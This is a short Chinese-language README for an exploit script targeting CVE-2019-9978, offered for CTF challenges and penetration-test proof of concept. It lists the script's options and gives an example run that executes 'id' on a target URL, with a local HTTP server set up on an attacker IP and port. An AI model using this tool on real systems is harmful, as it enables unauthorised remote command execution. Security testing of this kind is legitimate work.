本脚本能够以简单直接的方式利用 CVE-2019-9978 漏洞,适用于 Capture The Flag (CTF) 挑战或作为渗透测试的概念验证。
pip install requests 安装) ./cve-2019-9978.py -u http://target.com:9999 -c "your_system_command" -l your_ip:your_port
- `-u` 或 `--url`:设置用于发送有效载荷的目标 URL。
- `-c` 或 `--command`:设置要在目标系统上执行的系统命令。
- `-l` 或 `--local`:设置用于 HTTP 服务器的 IP 和端口(可选)。
./cve-2019-9978.py -u http://target.com:9999 -c "id" -l 10.10.13.15:12345
此代码仅用于教育和测试目的。未经适当授权在系统上使用是非法且不道德的。请负责任地使用。